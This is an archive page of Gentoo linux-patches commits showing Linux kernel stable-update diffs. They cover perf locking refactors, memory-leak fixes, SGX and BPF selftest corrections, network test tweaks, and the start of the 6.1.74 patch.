+-	int line_out_count =
+-		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
+-	int index = elem->control;
++	int index = line_out_remap(private, elem->control);
+ 	int oval, val, err = 0;
+ 
+-	if (index < line_out_count)
+-		index = line_out_remap(private, index);
+-
+ 	mutex_lock(&private->data_mutex);
+ 
+ 	oval = private->mux[index];
+diff --git a/tools/include/uapi/linux/bpf.h b/tools/include/uapi/linux/bpf.h
+index 92dbe89dafbf5..201dc77ebbd77 100644
+--- a/tools/include/uapi/linux/bpf.h
++++ b/tools/include/uapi/linux/bpf.h
+@@ -4353,6 +4353,8 @@ union bpf_attr {
+  * long bpf_get_task_stack(struct task_struct *task, void *buf, u32 size, u64 flags)
+  *	Description
+  *		Return a user or a kernel stack in bpf program provided buffer.
++ *		Note: the user stack will only be populated if the *task* is
++ *		the current task; all other tasks will return -EOPNOTSUPP.
+  *		To achieve this, the helper needs *task*, which is a valid
+  *		pointer to **struct task_struct**. To store the stacktrace, the
+  *		bpf program provides *buf* with a nonnegative *size*.
+@@ -4364,6 +4366,7 @@ union bpf_attr {
+  *
+  *		**BPF_F_USER_STACK**
+  *			Collect a user space stack instead of a kernel stack.
++ *			The *task* must be the current task.
+  *		**BPF_F_USER_BUILD_ID**
+  *			Collect buildid+offset instead of ips for user stack,
+  *			only valid if **BPF_F_USER_STACK** is also specified.
+diff --git a/tools/lib/api/io.h b/tools/lib/api/io.h
+index 777c20f6b6047..458acd294237d 100644
+--- a/tools/lib/api/io.h
++++ b/tools/lib/api/io.h
+@@ -9,6 +9,7 @@
+ 
+ #include <stdlib.h>
+ #include <unistd.h>
++#include <linux/types.h>
+ 
+ struct io {
+ 	/* File descriptor being read/ */
+diff --git a/tools/perf/util/bpf-event.c b/tools/perf/util/bpf-event.c
+index cc7c1f90cf629..91c7bfa82a50a 100644
+--- a/tools/perf/util/bpf-event.c
++++ b/tools/perf/util/bpf-event.c
+@@ -606,9 +606,9 @@ int evlist__add_bpf_sb_event(struct evlist *evlist, struct perf_env *env)
+ 	return evlist__add_sb_event(evlist, &attr, bpf_event__sb_cb, env);
+ }
+ 
+-void bpf_event__print_bpf_prog_info(struct bpf_prog_info *info,
+-				    struct perf_env *env,
+-				    FILE *fp)
++void __bpf_event__print_bpf_prog_info(struct bpf_prog_info *info,
++				      struct perf_env *env,
++				      FILE *fp)
+ {
+ 	__u32 *prog_lens = (__u32 *)(uintptr_t)(info->jited_func_lens);
+ 	__u64 *prog_addrs = (__u64 *)(uintptr_t)(info->jited_ksyms);
+@@ -624,7 +624,7 @@ void bpf_event__print_bpf_prog_info(struct bpf_prog_info *info,
+ 	if (info->btf_id) {
+ 		struct btf_node *node;
+ 
+-		node = perf_env__find_btf(env, info->btf_id);
++		node = __perf_env__find_btf(env, info->btf_id);
+ 		if (node)
+ 			btf = btf__new((__u8 *)(node->data),
+ 				       node->data_size);
+diff --git a/tools/perf/util/bpf-event.h b/tools/perf/util/bpf-event.h
+index 1bcbd4fb6c669..e2f0420905f59 100644
+--- a/tools/perf/util/bpf-event.h
++++ b/tools/perf/util/bpf-event.h
+@@ -33,9 +33,9 @@ struct btf_node {
+ int machine__process_bpf(struct machine *machine, union perf_event *event,
+ 			 struct perf_sample *sample);
+ int evlist__add_bpf_sb_event(struct evlist *evlist, struct perf_env *env);
+-void bpf_event__print_bpf_prog_info(struct bpf_prog_info *info,
+-				    struct perf_env *env,
+-				    FILE *fp);
++void __bpf_event__print_bpf_prog_info(struct bpf_prog_info *info,
++				      struct perf_env *env,
++				      FILE *fp);
+ #else
+ static inline int machine__process_bpf(struct machine *machine __maybe_unused,
+ 				       union perf_event *event __maybe_unused,
+@@ -50,9 +50,9 @@ static inline int evlist__add_bpf_sb_event(struct evlist *evlist __maybe_unused,
+ 	return 0;
+ }
+ 
+-static inline void bpf_event__print_bpf_prog_info(struct bpf_prog_info *info __maybe_unused,
+-						  struct perf_env *env __maybe_unused,
+-						  FILE *fp __maybe_unused)
++static inline void __bpf_event__print_bpf_prog_info(struct bpf_prog_info *info __maybe_unused,
++						    struct perf_env *env __maybe_unused,
++						    FILE *fp __maybe_unused)
+ {
+ 
+ }
+diff --git a/tools/perf/util/env.c b/tools/perf/util/env.c
+index 5b8cf6a421a49..5d878bae7d9a5 100644
+--- a/tools/perf/util/env.c
++++ b/tools/perf/util/env.c
+@@ -21,13 +21,19 @@ struct perf_env perf_env;
+ 
+ void perf_env__insert_bpf_prog_info(struct perf_env *env,
+ 				    struct bpf_prog_info_node *info_node)
++{
++	down_write(&env->bpf_progs.lock);
++	__perf_env__insert_bpf_prog_info(env, info_node);
++	up_write(&env->bpf_progs.lock);
++}
++
++void __perf_env__insert_bpf_prog_info(struct perf_env *env, struct bpf_prog_info_node *info_node)
+ {
+ 	__u32 prog_id = info_node->info_linear->info.id;
+ 	struct bpf_prog_info_node *node;
+ 	struct rb_node *parent = NULL;
+ 	struct rb_node **p;
+ 
+-	down_write(&env->bpf_progs.lock);
+ 	p = &env->bpf_progs.infos.rb_node;
+ 
+ 	while (*p != NULL) {
+@@ -39,15 +45,13 @@ void perf_env__insert_bpf_prog_info(struct perf_env *env,
+ 			p = &(*p)->rb_right;
+ 		} else {
+ 			pr_debug("duplicated bpf prog info %u\n", prog_id);
+-			goto out;
++			return;
+ 		}
+ 	}
+ 
+ 	rb_link_node(&info_node->rb_node, parent, p);
+ 	rb_insert_color(&info_node->rb_node, &env->bpf_progs.infos);
+ 	env->bpf_progs.infos_cnt++;
+-out:
+-	up_write(&env->bpf_progs.lock);
+ }
+ 
+ struct bpf_prog_info_node *perf_env__find_bpf_prog_info(struct perf_env *env,
+@@ -76,14 +80,22 @@ out:
+ }
+ 
+ bool perf_env__insert_btf(struct perf_env *env, struct btf_node *btf_node)
++{
++	bool ret;
++
++	down_write(&env->bpf_progs.lock);
++	ret = __perf_env__insert_btf(env, btf_node);
++	up_write(&env->bpf_progs.lock);
++	return ret;
++}
++
++bool __perf_env__insert_btf(struct perf_env *env, struct btf_node *btf_node)
+ {
+ 	struct rb_node *parent = NULL;
+ 	__u32 btf_id = btf_node->id;
+ 	struct btf_node *node;
+ 	struct rb_node **p;
+-	bool ret = true;
+ 
+-	down_write(&env->bpf_progs.lock);
+ 	p = &env->bpf_progs.btfs.rb_node;
+ 
+ 	while (*p != NULL) {
+@@ -95,25 +107,31 @@ bool perf_env__insert_btf(struct perf_env *env, struct btf_node *btf_node)
+ 			p = &(*p)->rb_right;
+ 		} else {
+ 			pr_debug("duplicated btf %u\n", btf_id);
+-			ret = false;
+-			goto out;
++			return false;
+ 		}
+ 	}
+ 
+ 	rb_link_node(&btf_node->rb_node, parent, p);
+ 	rb_insert_color(&btf_node->rb_node, &env->bpf_progs.btfs);
+ 	env->bpf_progs.btfs_cnt++;
+-out:
+-	up_write(&env->bpf_progs.lock);
+-	return ret;
++	return true;
+ }
+ 
+ struct btf_node *perf_env__find_btf(struct perf_env *env, __u32 btf_id)
++{
++	struct btf_node *res;
++
++	down_read(&env->bpf_progs.lock);
++	res = __perf_env__find_btf(env, btf_id);
++	up_read(&env->bpf_progs.lock);
++	return res;
++}
++
++struct btf_node *__perf_env__find_btf(struct perf_env *env, __u32 btf_id)
+ {
+ 	struct btf_node *node = NULL;
+ 	struct rb_node *n;
+ 
+-	down_read(&env->bpf_progs.lock);
+ 	n = env->bpf_progs.btfs.rb_node;
+ 
+ 	while (n) {
+@@ -123,13 +141,9 @@ struct btf_node *perf_env__find_btf(struct perf_env *env, __u32 btf_id)
+ 		else if (btf_id > node->id)
+ 			n = n->rb_right;
+ 		else
+-			goto out;
++			return node;
+ 	}
+-	node = NULL;
+-
+-out:
+-	up_read(&env->bpf_progs.lock);
+-	return node;
++	return NULL;
+ }
+ 
+ /* purge data in bpf_progs.infos tree */
+diff --git a/tools/perf/util/env.h b/tools/perf/util/env.h
+index 4566c51f2fd95..359eff51cb85b 100644
+--- a/tools/perf/util/env.h
++++ b/tools/perf/util/env.h
+@@ -164,12 +164,16 @@ const char *perf_env__raw_arch(struct perf_env *env);
+ int perf_env__nr_cpus_avail(struct perf_env *env);
+ 
+ void perf_env__init(struct perf_env *env);
++void __perf_env__insert_bpf_prog_info(struct perf_env *env,
++				      struct bpf_prog_info_node *info_node);
+ void perf_env__insert_bpf_prog_info(struct perf_env *env,
+ 				    struct bpf_prog_info_node *info_node);
+ struct bpf_prog_info_node *perf_env__find_bpf_prog_info(struct perf_env *env,
+ 							__u32 prog_id);
+ bool perf_env__insert_btf(struct perf_env *env, struct btf_node *btf_node);
++bool __perf_env__insert_btf(struct perf_env *env, struct btf_node *btf_node);
+ struct btf_node *perf_env__find_btf(struct perf_env *env, __u32 btf_id);
++struct btf_node *__perf_env__find_btf(struct perf_env *env, __u32 btf_id);
+ 
+ int perf_env__numa_node(struct perf_env *env, struct perf_cpu cpu);
+ char *perf_env__find_pmu_cap(struct perf_env *env, const char *pmu_name,
+diff --git a/tools/perf/util/genelf.c b/tools/perf/util/genelf.c
+index fefc72066c4e8..ac17a3cb59dc0 100644
+--- a/tools/perf/util/genelf.c
++++ b/tools/perf/util/genelf.c
+@@ -293,9 +293,9 @@ jit_write_elf(int fd, uint64_t load_addr, const char *sym,
+ 	 */
+ 	phdr = elf_newphdr(e, 1);
+ 	phdr[0].p_type = PT_LOAD;
+-	phdr[0].p_offset = 0;
+-	phdr[0].p_vaddr = 0;
+-	phdr[0].p_paddr = 0;
++	phdr[0].p_offset = GEN_ELF_TEXT_OFFSET;
++	phdr[0].p_vaddr = GEN_ELF_TEXT_OFFSET;
++	phdr[0].p_paddr = GEN_ELF_TEXT_OFFSET;
+ 	phdr[0].p_filesz = csize;
+ 	phdr[0].p_memsz = csize;
+ 	phdr[0].p_flags = PF_X | PF_R;
+diff --git a/tools/perf/util/header.c b/tools/perf/util/header.c
+index 9e2dce70b1300..b2b0293567f07 100644
+--- a/tools/perf/util/header.c
++++ b/tools/perf/util/header.c
+@@ -1809,8 +1809,8 @@ static void print_bpf_prog_info(struct feat_fd *ff, FILE *fp)
+ 		node = rb_entry(next, struct bpf_prog_info_node, rb_node);
+ 		next = rb_next(&node->rb_node);
+ 
+-		bpf_event__print_bpf_prog_info(&node->info_linear->info,
+-					       env, fp);
++		__bpf_event__print_bpf_prog_info(&node->info_linear->info,
++						 env, fp);
+ 	}
+ 
+ 	up_read(&env->bpf_progs.lock);
+@@ -3136,7 +3136,7 @@ static int process_bpf_prog_info(struct feat_fd *ff, void *data __maybe_unused)
+ 		/* after reading from file, translate offset to address */
+ 		bpil_offs_to_addr(info_linear);
+ 		info_node->info_linear = info_linear;
+-		perf_env__insert_bpf_prog_info(env, info_node);
++		__perf_env__insert_bpf_prog_info(env, info_node);
+ 	}
+ 
+ 	up_write(&env->bpf_progs.lock);
+@@ -3183,7 +3183,7 @@ static int process_bpf_btf(struct feat_fd *ff, void *data __maybe_unused)
+ 		if (__do_read(ff, node->data, data_size))
+ 			goto out;
+ 
+-		perf_env__insert_btf(env, node);
++		__perf_env__insert_btf(env, node);
+ 		node = NULL;
+ 	}
+ 
+@@ -4314,9 +4314,10 @@ size_t perf_event__fprintf_event_update(union perf_event *event, FILE *fp)
+ 		ret += fprintf(fp, "... ");
+ 
+ 		map = cpu_map__new_data(&ev->cpus.cpus);
+-		if (map)
++		if (map) {
+ 			ret += cpu_map__fprintf(map, fp);
+-		else
++			perf_cpu_map__put(map);
++		} else
+ 			ret += fprintf(fp, "failed to get cpus\n");
+ 		break;
+ 	default:
+diff --git a/tools/perf/util/hisi-ptt.c b/tools/perf/util/hisi-ptt.c
+index 45b614bb73bfa..764d660d30e2f 100644
+--- a/tools/perf/util/hisi-ptt.c
++++ b/tools/perf/util/hisi-ptt.c
+@@ -121,6 +121,7 @@ static int hisi_ptt_process_auxtrace_event(struct perf_session *session,
+ 	if (dump_trace)
+ 		hisi_ptt_dump_event(ptt, data, size);
+ 
++	free(data);
+ 	return 0;
+ }
+ 
+diff --git a/tools/testing/selftests/alsa/mixer-test.c b/tools/testing/selftests/alsa/mixer-test.c
+index 37da902545a41..9ad39db32d144 100644
+--- a/tools/testing/selftests/alsa/mixer-test.c
++++ b/tools/testing/selftests/alsa/mixer-test.c
+@@ -205,7 +205,7 @@ static void find_controls(void)
+ 		err = snd_ctl_poll_descriptors(card_data->handle,
+ 					       &card_data->pollfd, 1);
+ 		if (err != 1) {
+-			ksft_exit_fail_msg("snd_ctl_poll_descriptors() failed for %d\n",
++			ksft_exit_fail_msg("snd_ctl_poll_descriptors() failed for card %d: %d\n",
+ 				       card, err);
+ 		}
+ 
+@@ -358,7 +358,7 @@ static bool ctl_value_index_valid(struct ctl_data *ctl,
+ 		}
+ 
+ 		if (int64_val > snd_ctl_elem_info_get_max64(ctl->info)) {
+-			ksft_print_msg("%s.%d value %lld more than maximum %lld\n",
++			ksft_print_msg("%s.%d value %lld more than maximum %ld\n",
+ 				       ctl->name, index, int64_val,
+ 				       snd_ctl_elem_info_get_max(ctl->info));
+ 			return false;
+diff --git a/tools/testing/selftests/bpf/prog_tests/bpf_iter.c b/tools/testing/selftests/bpf/prog_tests/bpf_iter.c
+index ecde236047fe1..0c67a4e28effa 100644
+--- a/tools/testing/selftests/bpf/prog_tests/bpf_iter.c
++++ b/tools/testing/selftests/bpf/prog_tests/bpf_iter.c
+@@ -338,6 +338,8 @@ static void test_task_stack(void)
+ 	do_dummy_read(skel->progs.dump_task_stack);
+ 	do_dummy_read(skel->progs.get_task_user_stacks);
+ 
++	ASSERT_EQ(skel->bss->num_user_stacks, 1, "num_user_stacks");
++
+ 	bpf_iter_task_stack__destroy(skel);
+ }
+ 
+diff --git a/tools/testing/selftests/bpf/prog_tests/time_tai.c b/tools/testing/selftests/bpf/prog_tests/time_tai.c
+index a311198236661..f45af1b0ef2c4 100644
+--- a/tools/testing/selftests/bpf/prog_tests/time_tai.c
++++ b/tools/testing/selftests/bpf/prog_tests/time_tai.c
+@@ -56,7 +56,7 @@ void test_time_tai(void)
+ 	ASSERT_NEQ(ts2, 0, "tai_ts2");
+ 
+ 	/* TAI is moving forward only */
+-	ASSERT_GT(ts2, ts1, "tai_forward");
++	ASSERT_GE(ts2, ts1, "tai_forward");
+ 
+ 	/* Check for future */
+ 	ret = clock_gettime(CLOCK_TAI, &now_tai);
+diff --git a/tools/testing/selftests/bpf/progs/bpf_iter_task_stack.c b/tools/testing/selftests/bpf/progs/bpf_iter_task_stack.c
+index f2b8167b72a84..442f4ca39fd76 100644
+--- a/tools/testing/selftests/bpf/progs/bpf_iter_task_stack.c
++++ b/tools/testing/selftests/bpf/progs/bpf_iter_task_stack.c
+@@ -35,6 +35,8 @@ int dump_task_stack(struct bpf_iter__task *ctx)
+ 	return 0;
+ }
+ 
++int num_user_stacks = 0;
++
+ SEC("iter/task")
+ int get_task_user_stacks(struct bpf_iter__task *ctx)
+ {
+@@ -51,6 +53,9 @@ int get_task_user_stacks(struct bpf_iter__task *ctx)
+ 	if (res <= 0)
+ 		return 0;
+ 
++	/* Only one task, the current one, should succeed */
++	++num_user_stacks;
++
+ 	buf_sz += res;
+ 
+ 	/* If the verifier doesn't refine bpf_get_task_stack res, and instead
+diff --git a/tools/testing/selftests/bpf/progs/xdp_synproxy_kern.c b/tools/testing/selftests/bpf/progs/xdp_synproxy_kern.c
+index 736686e903f6a..26bfbc73d1298 100644
+--- a/tools/testing/selftests/bpf/progs/xdp_synproxy_kern.c
++++ b/tools/testing/selftests/bpf/progs/xdp_synproxy_kern.c
+@@ -447,13 +447,13 @@ static __always_inline int tcp_lookup(void *ctx, struct header_pointers *hdr, bo
+ 		unsigned long status = ct->status;
+ 
+ 		bpf_ct_release(ct);
+-		if (status & IPS_CONFIRMED_BIT)
++		if (status & IPS_CONFIRMED)
+ 			return XDP_PASS;
+ 	} else if (ct_lookup_opts.error != -ENOENT) {
+ 		return XDP_ABORTED;
+ 	}
+ 
+-	/* error == -ENOENT || !(status & IPS_CONFIRMED_BIT) */
++	/* error == -ENOENT || !(status & IPS_CONFIRMED) */
+ 	return XDP_TX;
+ }
+ 
+diff --git a/tools/testing/selftests/drivers/net/mlxsw/qos_pfc.sh b/tools/testing/selftests/drivers/net/mlxsw/qos_pfc.sh
+index f9858e221996c..6a3002fbcf43a 100755
+--- a/tools/testing/selftests/drivers/net/mlxsw/qos_pfc.sh
++++ b/tools/testing/selftests/drivers/net/mlxsw/qos_pfc.sh
+@@ -121,6 +121,9 @@ h2_destroy()
+ 
+ switch_create()
+ {
++	local lanes_swp4
++	local pg1_size
++
+ 	# pools
+ 	# -----
+ 
+@@ -230,7 +233,20 @@ switch_create()
+ 	dcb pfc set dev $swp4 prio-pfc all:off 1:on
+ 	# PG0 will get autoconfigured to Xoff, give PG1 arbitrarily 100K, which
+ 	# is (-2*MTU) about 80K of delay provision.
+-	dcb buffer set dev $swp4 buffer-size all:0 1:$_100KB
++	pg1_size=$_100KB
++
++	setup_wait_dev_with_timeout $swp4
++
++	lanes_swp4=$(ethtool $swp4 | grep 'Lanes:')
++	lanes_swp4=${lanes_swp4#*"Lanes: "}
++
++	# 8-lane ports use two buffers among which the configured buffer
++	# is split, so double the size to get twice (20K + 80K).
++	if [[ $lanes_swp4 -eq 8 ]]; then
++		pg1_size=$((pg1_size * 2))
++	fi
++
++	dcb buffer set dev $swp4 buffer-size all:0 1:$pg1_size
+ 
+ 	# bridges
+ 	# -------
+diff --git a/tools/testing/selftests/drivers/net/mlxsw/spectrum-2/tc_flower.sh b/tools/testing/selftests/drivers/net/mlxsw/spectrum-2/tc_flower.sh
+index fb850e0ec8375..7bf56ea161e35 100755
+--- a/tools/testing/selftests/drivers/net/mlxsw/spectrum-2/tc_flower.sh
++++ b/tools/testing/selftests/drivers/net/mlxsw/spectrum-2/tc_flower.sh
+@@ -10,7 +10,8 @@ lib_dir=$(dirname $0)/../../../../net/forwarding
+ ALL_TESTS="single_mask_test identical_filters_test two_masks_test \
+ 	multiple_masks_test ctcam_edge_cases_test delta_simple_test \
+ 	delta_two_masks_one_key_test delta_simple_rehash_test \
+-	bloom_simple_test bloom_complex_test bloom_delta_test"
++	bloom_simple_test bloom_complex_test bloom_delta_test \
++	max_erp_entries_test"
+ NUM_NETIFS=2
+ source $lib_dir/lib.sh
+ source $lib_dir/tc_common.sh
+@@ -983,6 +984,55 @@ bloom_delta_test()
+ 	log_test "bloom delta test ($tcflags)"
+ }
+ 
++max_erp_entries_test()
++{
++	# The number of eRP entries is limited. Once the maximum number of eRPs
++	# has been reached, filters cannot be added. This test verifies that
++	# when this limit is reached, inserstion fails without crashing.
++
++	RET=0
++
++	local num_masks=32
++	local num_regions=15
++	local chain_failed
++	local mask_failed
++	local ret
++
++	if [[ "$tcflags" != "skip_sw" ]]; then
++		return 0;
++	fi
++
++	for ((i=1; i < $num_regions; i++)); do
++		for ((j=$num_masks; j >= 0; j--)); do
++			tc filter add dev $h2 ingress chain $i protocol ip \
++				pref $i	handle $j flower $tcflags \
++				dst_ip 192.1.0.0/$j &> /dev/null
++			ret=$?
++
++			if [ $ret -ne 0 ]; then
++				chain_failed=$i
++				mask_failed=$j
++				break 2
++			fi
++		done
++	done
++
++	# We expect to exceed the maximum number of eRP entries, so that
++	# insertion eventually fails. Otherwise, the test should be adjusted to
++	# add more filters.
++	check_fail $ret "expected to exceed number of eRP entries"
++
++	for ((; i >= 1; i--)); do
++		for ((j=0; j <= $num_masks; j++)); do
++			tc filter del dev $h2 ingress chain $i protocol ip \
++				pref $i handle $j flower &> /dev/null
++		done
++	done
++
++	log_test "max eRP entries test ($tcflags). " \
++		"max chain $chain_failed, mask $mask_failed"
++}
++
+ setup_prepare()
+ {
+ 	h1=${NETIFS[p1]}
+diff --git a/tools/testing/selftests/net/arp_ndisc_untracked_subnets.sh b/tools/testing/selftests/net/arp_ndisc_untracked_subnets.sh
+index c899b446acb62..327427ec10f56 100755
+--- a/tools/testing/selftests/net/arp_ndisc_untracked_subnets.sh
++++ b/tools/testing/selftests/net/arp_ndisc_untracked_subnets.sh
+@@ -150,7 +150,7 @@ arp_test_gratuitous() {
+ 	fi
+ 	# Supply arp_accept option to set up which sets it in sysctl
+ 	setup ${arp_accept}
+-	ip netns exec ${HOST_NS} arping -A -U ${HOST_ADDR} -c1 2>&1 >/dev/null
++	ip netns exec ${HOST_NS} arping -A -I ${HOST_INTF} -U ${HOST_ADDR} -c1 2>&1 >/dev/null
+ 
+ 	if verify_arp $1 $2; then
+ 		printf "    TEST: %-60s  [ OK ]\n" "${test_msg[*]}"
+diff --git a/tools/testing/selftests/net/fib_nexthop_multiprefix.sh b/tools/testing/selftests/net/fib_nexthop_multiprefix.sh
+index 51df5e305855a..b52d59547fc59 100755
+--- a/tools/testing/selftests/net/fib_nexthop_multiprefix.sh
++++ b/tools/testing/selftests/net/fib_nexthop_multiprefix.sh
+@@ -209,12 +209,12 @@ validate_v6_exception()
+ 		echo "Route get"
+ 		ip -netns h0 -6 ro get ${dst}
+ 		echo "Searching for:"
+-		echo "    ${dst} from :: via ${r1} dev eth0 src ${h0} .* mtu ${mtu}"
++		echo "    ${dst}.* via ${r1} dev eth0 src ${h0} .* mtu ${mtu}"
+ 		echo
+ 	fi
+ 
+ 	ip -netns h0 -6 ro get ${dst} | \
+-	grep -q "${dst} from :: via ${r1} dev eth0 src ${h0} .* mtu ${mtu}"
++	grep -q "${dst}.* via ${r1} dev eth0 src ${h0} .* mtu ${mtu}"
+ 	rc=$?
+ 
+ 	log_test $rc 0 "IPv6: host 0 to host ${i}, mtu ${mtu}"
+diff --git a/tools/testing/selftests/powerpc/math/fpu_preempt.c b/tools/testing/selftests/powerpc/math/fpu_preempt.c
+index 5235bdc8c0b11..3e5b5663d2449 100644
+--- a/tools/testing/selftests/powerpc/math/fpu_preempt.c
++++ b/tools/testing/selftests/powerpc/math/fpu_preempt.c
+@@ -37,19 +37,20 @@ __thread double darray[] = {0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0,
+ int threads_starting;
+ int running;
+ 
+-extern void preempt_fpu(double *darray, int *threads_starting, int *running);
++extern int preempt_fpu(double *darray, int *threads_starting, int *running);
+ 
+ void *preempt_fpu_c(void *p)
+ {
++	long rc;
+ 	int i;
++
+ 	srand(pthread_self());
+ 	for (i = 0; i < 21; i++)
+ 		darray[i] = rand();
+ 
+-	/* Test failed if it ever returns */
+-	preempt_fpu(darray, &threads_starting, &running);
++	rc = preempt_fpu(darray, &threads_starting, &running);
+ 
+-	return p;
++	return (void *)rc;
+ }
+ 
+ int test_preempt_fpu(void)
+diff --git a/tools/testing/selftests/powerpc/math/vmx_preempt.c b/tools/testing/selftests/powerpc/math/vmx_preempt.c
+index 6761d6ce30eca..6f7cf400c6875 100644
+--- a/tools/testing/selftests/powerpc/math/vmx_preempt.c
++++ b/tools/testing/selftests/powerpc/math/vmx_preempt.c
+@@ -37,19 +37,21 @@ __thread vector int varray[] = {{1, 2, 3, 4}, {5, 6, 7, 8}, {9, 10,11,12},
+ int threads_starting;
+ int running;
+ 
+-extern void preempt_vmx(vector int *varray, int *threads_starting, int *running);
++extern int preempt_vmx(vector int *varray, int *threads_starting, int *running);
+ 
+ void *preempt_vmx_c(void *p)
+ {
+ 	int i, j;
++	long rc;
++
+ 	srand(pthread_self());
+ 	for (i = 0; i < 12; i++)
+ 		for (j = 0; j < 4; j++)
+ 			varray[i][j] = rand();
+ 
+-	/* Test fails if it ever returns */
+-	preempt_vmx(varray, &threads_starting, &running);
+-	return p;
++	rc = preempt_vmx(varray, &threads_starting, &running);
++
++	return (void *)rc;
+ }
+ 
+ int test_preempt_vmx(void)
+diff --git a/tools/testing/selftests/sgx/Makefile b/tools/testing/selftests/sgx/Makefile
+index 75af864e07b65..04ee17d3d3947 100644
+--- a/tools/testing/selftests/sgx/Makefile
++++ b/tools/testing/selftests/sgx/Makefile
+@@ -16,9 +16,9 @@ HOST_CFLAGS := -Wall -Werror -g $(INCLUDES) -fPIC -z noexecstack
+ ENCL_CFLAGS := -Wall -Werror -static -nostdlib -nostartfiles -fPIC \
+ 	       -fno-stack-protector -mrdrnd $(INCLUDES)
+ 
++ifeq ($(CAN_BUILD_X86_64), 1)
+ TEST_CUSTOM_PROGS := $(OUTPUT)/test_sgx
+ 
+-ifeq ($(CAN_BUILD_X86_64), 1)
+ all: $(TEST_CUSTOM_PROGS) $(OUTPUT)/test_encl.elf
+ endif
+ 
+diff --git a/tools/testing/selftests/sgx/load.c b/tools/testing/selftests/sgx/load.c
+index 94bdeac1cf041..c9f658e44de6c 100644
+--- a/tools/testing/selftests/sgx/load.c
++++ b/tools/testing/selftests/sgx/load.c
+@@ -136,11 +136,11 @@ static bool encl_ioc_add_pages(struct encl *encl, struct encl_segment *seg)
+  */
+ uint64_t encl_get_entry(struct encl *encl, const char *symbol)
+ {
++	Elf64_Sym *symtab = NULL;
++	char *sym_names = NULL;
+ 	Elf64_Shdr *sections;
+-	Elf64_Sym *symtab;
+ 	Elf64_Ehdr *ehdr;
+-	char *sym_names;
+-	int num_sym;
++	int num_sym = 0;
+ 	int i;
+ 
+ 	ehdr = encl->bin;
+@@ -161,6 +161,9 @@ uint64_t encl_get_entry(struct encl *encl, const char *symbol)
+ 		}
+ 	}
+ 
++	if (!symtab || !sym_names)
++		return 0;
++
+ 	for (i = 0; i < num_sym; i++) {
+ 		Elf64_Sym *sym = &symtab[i];
+ 
+diff --git a/tools/testing/selftests/sgx/sigstruct.c b/tools/testing/selftests/sgx/sigstruct.c
+index a07896a463643..d73b29becf5b0 100644
+--- a/tools/testing/selftests/sgx/sigstruct.c
++++ b/tools/testing/selftests/sgx/sigstruct.c
+@@ -318,9 +318,9 @@ bool encl_measure(struct encl *encl)
+ 	struct sgx_sigstruct *sigstruct = &encl->sigstruct;
+ 	struct sgx_sigstruct_payload payload;
+ 	uint8_t digest[SHA256_DIGEST_LENGTH];
++	EVP_MD_CTX *ctx = NULL;
+ 	unsigned int siglen;
+ 	RSA *key = NULL;
+-	EVP_MD_CTX *ctx;
+ 	int i;
+ 
+ 	memset(sigstruct, 0, sizeof(*sigstruct));
+@@ -384,7 +384,8 @@ bool encl_measure(struct encl *encl)
+ 	return true;
+ 
+ err:
+-	EVP_MD_CTX_destroy(ctx);
++	if (ctx)
++		EVP_MD_CTX_destroy(ctx);
+ 	RSA_free(key);
+ 	return false;
+ }
+diff --git a/tools/testing/selftests/sgx/test_encl.c b/tools/testing/selftests/sgx/test_encl.c
+index c0d6397295e31..ae791df3e5a57 100644
+--- a/tools/testing/selftests/sgx/test_encl.c
++++ b/tools/testing/selftests/sgx/test_encl.c
+@@ -24,10 +24,11 @@ static void do_encl_emodpe(void *_op)
+ 	secinfo.flags = op->flags;
+ 
+ 	asm volatile(".byte 0x0f, 0x01, 0xd7"
+-				:
++				: /* no outputs */
+ 				: "a" (EMODPE),
+ 				  "b" (&secinfo),
+-				  "c" (op->epc_addr));
++				  "c" (op->epc_addr)
++				: "memory" /* read from secinfo pointer */);
+ }
+ 
+ static void do_encl_eaccept(void *_op)
+@@ -42,7 +43,8 @@ static void do_encl_eaccept(void *_op)
+ 				: "=a" (rax)
+ 				: "a" (EACCEPT),
+ 				  "b" (&secinfo),
+-				  "c" (op->epc_addr));
++				  "c" (op->epc_addr)
++				: "memory" /* read from secinfo pointer */);
+ 
+ 	op->ret = rax;
+ }


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-01-20 11:45 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-01-20 11:45 UTC (permalink / raw
  To: gentoo-commits

commit:     e03cb0c42952561dd7ad061b371076b7defafa36
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Jan 20 11:45:31 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Jan 20 11:45:31 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=e03cb0c4

Linux patch 6.1

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1073_linux-6.1.74.patch | 3175 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 3179 insertions(+)

diff --git a/0000_README b/0000_README
index 9cb280cd..32442528 100644
--- a/0000_README
+++ b/0000_README
@@ -335,6 +335,10 @@ Patch:  1072_linux-6.1.73.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.73
 
+Patch:  1073_linux-6.1.74.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.74
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1073_linux-6.1.74.patch b/1073_linux-6.1.74.patch
new file mode 100644
index 00000000..4e3e51d3
--- /dev/null
+++ b/1073_linux-6.1.74.patch
@@ -0,0 +1,3175 @@
+diff --git a/Makefile b/Makefile
+index e4f2d019ca745..63125d1ffd9cf 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 73
++SUBLEVEL = 74
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arc/kernel/signal.c b/arch/arc/kernel/signal.c
+index 3c1590c27fae3..723abcb10c801 100644
+--- a/arch/arc/kernel/signal.c
++++ b/arch/arc/kernel/signal.c
+@@ -61,7 +61,7 @@ struct rt_sigframe {
+ 	unsigned int sigret_magic;
+ };
+ 
